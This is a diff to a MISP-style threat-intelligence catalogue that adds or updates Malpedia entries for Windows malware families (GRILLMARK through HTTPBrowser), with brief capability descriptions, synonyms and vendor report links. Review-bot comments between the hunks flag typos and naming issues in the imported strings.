@@ -9122,12 +17054,40 @@ "uuid": "5a683d4f-31a1-423e-a136-d348910ca967", "value": "GreyEnergy" }, + { + "description": "This is a proxy-aware HTTP backdoor that is implemented as a service and uses the compromised system's proxy settings to access the internet. C&C traffic is base64 encoded and the files sent to the server are compressed with aPLib.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark", + "https://content.fireeye.com/m-trends/rpt-m-trends-2019", + "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/" + ], + "synonyms": [ + "Hellsing Backdoor" + ], + "type": [] + }, + "uuid": "60cc0c72-e903-4dda-967a-9da0e12d4ac5", + "value": "GRILLMARK" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", - "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent", + "https://twitter.com/bryceabdo/status/1352359414746009608" + ], + "synonyms": [], + "type": [] + }, + "uuid": "57460bae-84ad-402d-8949-9103c5917703", + "value": "GRIMAGENT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok" ], "synonyms": [], "type": [] @@ -9135,6 +17095,20 @@ "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", "value": "GROK" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt", + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", + "https://twitter.com/ItsReallyNick/status/1208141697282117633" + ], + "synonyms": [], + "type": [] + }, + "uuid": "884782cf-9fdc-4f3c-8fba-e878330d0ef5", + "value": "GRUNT" + }, { "description": "", "meta": { 
@@ -9148,6 +17122,19 @@ "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", "value": "gsecdump" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy", + "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks" + ], + "synonyms": [], + "type": [] + }, + "uuid": "83d1bf1b-6557-4c2e-aa00-53013be73067", + "value": "GUP Proxy Tool" + }, { "description": "", "meta": { 
@@ -9187,12 +17174,39 @@ "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", "value": "HackSpy" }, + { + "description": "Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to a ftp-server.\r\nThe ransom note is embedded - in earlier versions as plain string, then as base64 string. In some versions, these strings are slightly obfuscated.\r\n\r\nContact is via an email address hosted on protonmail. Hakbit (original) had hakbit@, more recent \"KiraLock\" has kiraransom@ (among others of course).\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/", + "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://unit42.paloaltonetworks.com/thanos-ransomware/", + "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf", + "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/", + "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/" + ], + "synonyms": [ + "Thanos Ransomware" + ], + "type": [] + }, + "uuid": "18617856-c6c4-45f8-995f-4916a1b45b05", + "value": "Hakbit" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", - "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" + "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/", + "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf", + 
"https://www.youtube.com/watch?v=JPvcLLYR0tE", + "https://www.youtube.com/watch?v=FAFuSO9oAl0" ], "synonyms": [], "type": [] 
@@ -9201,23 +17215,25 @@ "value": "Hamweq" }, { - "description": "", + "description": "Hancitor(aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", + "https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", - "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", + "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", + "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", "https://www.uperesia.com/hancitor-packer-demystified", - "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", - "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", - 
"https://boozallenmts.com/resources/news/closer-look-hancitor", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/" ], "synonyms": [ "Chanitor" @@ -9239,6 +17255,20 @@ "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", "value": "HappyLocker (HiddenTear?)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e4948b4c-be46-44a4-81e6-3b1922448083", + "value": "HARDRAIN (Windows)" + }, { "description": "", "meta": { @@ -9260,6 +17290,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", + "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.secureworks.com/research/threat-profiles/iron-liberty", "https://www.f-secure.com/weblog/archives/00002718.html" ], "synonyms": [], 
@@ -9269,19 +17302,41 @@ "value": "Havex RAT" }, { - "description": "", + "description": "HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball", + "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dc07507b-959f-4521-be0f-b9ff2b32b909", + "value": "HAWKBALL" + }, + { + "description": "HawKeye is a keylogger that is distributed since 2013. Discovered by IBM X-Force, it is currently spread over phishing campaigns targeting businesses on a worldwide scale. It is designed to steal credentials from numerous applications but, in the last observed versions, new \"loader capabilities\" have been spotted. 
It is sold by its development team on dark web markets and hacking forums.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", + "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/", + "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/", + "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html", "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], "synonyms": [ + "HawkEye", "HawkEye Reborn", "Predator Pain" ], 
@@ -9290,6 +17345,36 @@ "uuid": "31615066-dbff-4134-b467-d97a337b408b", "value": "HawkEye Keylogger" }, + { + "description": "HDMR is a ransomware which encrypts user files and adds a .DMR64 extension. It also drops a ransom note named: \"!!! READ THIS !!!.hta\".", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr", + "http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html", + "https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1" + ], + "synonyms": [ + "GO-SPORT" + ], + "type": [] + }, + "uuid": "d643273f-7a53-4703-bf65-95716d55a5dd", + "value": "HDMR Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdroot", + "https://securelist.com/i-am-hdroot-part-1/72275/", + "https://securelist.com/i-am-hdroot-part-2/72356/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "af8df5d7-cd8c-41ea-b9ec-b69ab7811e2d", + "value": "HDRoot" + }, { "description": "", "meta": { 
@@ -9303,14 +17388,34 @@ "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", "value": "Helauto" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty", + "https://twitter.com/fwosar/status/1359167108727332868", + "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html", + "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/", + "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks" + ], + "synonyms": [ + "KittyCrypt" + ], + "type": [] + }, + "uuid": "433c97b5-89ac-4783-a312-8bb890590ff0", + "value": "HelloKitty" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", - "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", - "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], "synonyms": [], @@ -9324,8 +17429,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", - "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", - "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" + "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/" ], "synonyms": [], "type": [] 
@@ -9351,8 +17455,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", - "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html" + "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] @@ -9365,8 +17470,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", + "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [], "type": [] @@ -9380,6 +17489,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", "https://blog.dcso.de/enterprise-malware-as-a-service/", + "https://www.youtube.com/watch?v=9nuo-AGg4p4", + "https://dcso.de/2019/03/18/enterprise-malware-as-a-service", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], 
@@ -9416,14 +17527,38 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", - "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", - "https://twitter.com/struppigel/status/950787783353884672", - "https://github.com/goliate/hidden-tear" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee", + "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/", + "https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/", + "https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/", + "https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/", + "https://www.freebuf.com/column/174581.html", + "https://www.freebuf.com/column/175106.html" ], "synonyms": [], "type": [] }, + "uuid": "f1e4862e-75a3-4843-add3-726a6535019c", + "value": "Hidden Bee" + }, + { + "description": "HiddenTear is an open source ransomware developed by a Turkish programmer and later released as proof of concept on GitHub. The malware generates a local symmetric key in order to encrypt a configurable folder (/test was the default one) and it sends it to a centralized C&C server. Due to its small payload it was used as real attack vector over email phishing campaigns. 
Variants are still used in attacks.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", + "https://twitter.com/struppigel/status/950787783353884672", + "https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/", + "https://twitter.com/JAMESWT_MHT/status/1264828072001495041", + "https://github.com/goliate/hidden-tear", + "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", + "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring", + "https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html" + ], + "synonyms": [ + "FuckUnicorn" + ], + "type": [] + }, "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", "value": "HiddenTear" }, @@ -9433,6 +17568,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" ], "synonyms": [], 
@@ -9441,13 +17577,60 @@ "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", "value": "HideDRV" }, + { + "description": "According to FireEye, HIGHNOON is a backdoor that may consist of multiple components. The components may include a loader, a DLL, and a rootkit. Both the loader and the DLL may be dropped together, but the rootkit may be embedded in the DLL. The HIGHNOON loader may be designed to run as a Windows service.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon", + "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", + "https://twitter.com/MrDanPerez/status/1159461995013378048", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://content.fireeye.com/apt-41/rpt-apt41/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f04c5821-311f-44c9-9d6c-0fe3fd3a1336", + "value": "HIGHNOON" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon_bin", + "https://content.fireeye.com/apt-41/rpt-apt41/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0a86eb46-28b5-4797-af63-75f9b2ef9080", + "value": "HIGHNOON.BIN" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote", + "https://twitter.com/bkMSFT/status/1153994428949749761" + ], + "synonyms": [ + "ChyNode" + ], + "type": [] + }, + "uuid": "d9f03a69-507d-4b1d-af6d-e76fca5952b7", + "value": "HIGHNOTE" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", "https://www.recordedfuture.com/hidden-lynx-analysis/", - 
"https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" + "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", + "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" ], "synonyms": [], "type": [] @@ -9468,6 +17651,32 @@ "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", "value": "himan" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader", + "https://twitter.com/James_inthe_box/status/1260191589789392898" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b5e83cab-8096-40de-8a5b-5bf0f2e336b2", + "value": "Himera Loader" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hisoka", + "https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b6734ca0-599f-4992-9094-218d01ddfb3a", + "value": "Hisoka" + }, { "description": "", "meta": { 
@@ -9493,12 +17702,26 @@
 "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62",
 "value": "HLUX"
 },
+ {
+ "description": "Adware, tied to eGobbler and Nephos7 campaigns, ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.holcus",
+ "https://blog.confiant.com/malvertising-made-in-china-f5081521b3f0"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "379356c7-ec7a-4880-85d5-afe9608d6b60",
+ "value": "Holcus Installer (Adware)"
+ },
 {
 "description": " a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
 ],
 "synonyms": [],
 "type": []
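Review bot: The Holcus description `"Adware, tied to eGobbler and Nephos7 campaigns, "` ends in a dangling comma and a trailing space, so it reads as a truncated sentence; it should either be completed or trimmed to `"Adware, tied to eGobbler and Nephos7 campaigns."`. The value `"Holcus Installer (Adware)"` also folds a classification into the cluster name while `"type": []` stays empty, so the tag MISP derives from the value will carry the parenthetical; if the classification matters it belongs in the `type` array. Both strings come from the Malpedia API, so the fix belongs upstream or in a normalisation step of the import rather than in a hand edit of this file.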
@@ -9510,16 +17733,132 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", - "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", - "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex", + "https://twitter.com/CDA/status/1014144988454772736", + "https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/" ], "synonyms": [], "type": [] }, + "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", + "value": "HookInjEx" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", + "https://www.us-cert.gov/ncas/analysis-reports/ar19-304a", + "https://www.secureworks.com/research/threat-profiles/nickel-academy", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf", + "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" + ], + "synonyms": [ + "HANGMAN" + ], + "type": [] + }, "uuid": "3e489132-8687-46b3-b9a7-74ba8fafaddf", "value": "HOPLIGHT" }, + { + "description": "Hopscotch is part of the Regin framework.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch", + "https://www.youtube.com/watch?v=VnzP00DZlx4" + ], + 
"synonyms": [], + "type": [] + }, + "uuid": "0ab4f3ce-5474-4b1e-8ad9-b9ad80e75be8", + "value": "Hopscotch" + }, + { + "description": "Remote Acess Tool Written in VB.NET.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.horuseyes", + "https://github.com/arsium/HorusEyesRat_Public" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cbe47d19-2f74-4dbc-84b5-44c31518c8a7", + "value": "HorusEyes RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d", + "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4500694c-d71a-4d11-8f9c-0036156826b6", + "value": "HOTCROISSANT" + }, + { + "description": "HOTWAX is a module that upon starting imports all necessary system API functions, and searches for a .CHM file. HOTWAX decrypts a payload using the Spritz algorithm with a hard-coded key and then searches the target process and attempts to inject the decrypted payload module from the CHM file into the address space of the target process.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d5391c00-9a75-457c-9ef0-0a75c5df8348", + "value": "HOTWAX" + }, + { + "description": "Houdini is a VBS-based RAT dating back to 2013. 
Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37", + "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/", + "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html", + "https://www.youtube.com/watch?v=h3KLKCdMUUY", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md", + "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", + "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/", + "https://blogs.360.cn/post/APT-C-44.html", + "http://blog.morphisec.com/hworm-houdini-aka-njrat", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", + "https://cofense.com/houdini-worm-transformed-new-phishing-attack/" + ], + "synonyms": [ + "Hworm", + "Jenxcus", + "Kognito", + "Njw0rm", + "WSHRAT", + "dinihou", + "dunihi" + ], + "type": [] + }, + "uuid": "11775f11-03a0-4ba8-932f-c125dfb66e35", + "value": "Houdini" + }, { "description": "", "meta": { 
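Review bot: The HorusEyes RAT description in this hunk has a spelling error, `"Remote Acess Tool Written in VB.NET."`, which should read `"Remote Access Tool written in VB.NET."`. The Houdini description opens with `Past in the days`, presumably meaning `In the past`; both strings are imported verbatim from Malpedia, so the correction belongs upstream or in a normalisation pass of the import script. Note also that the Houdini entry now carries `"Hworm"` as a synonym, which is relevant because a later hunk of this patch deletes the standalone Hworm cluster.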
@@ -9550,8 +17889,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
- "https://www.secureworks.com/research/htran"
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mayfair",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.secureworks.com/research/htran",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/"
 ],
 "synonyms": [
 "HUC Packet Transmit Tool"
@@ -9566,9 +17912,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser",
- "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/"
+ "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/",
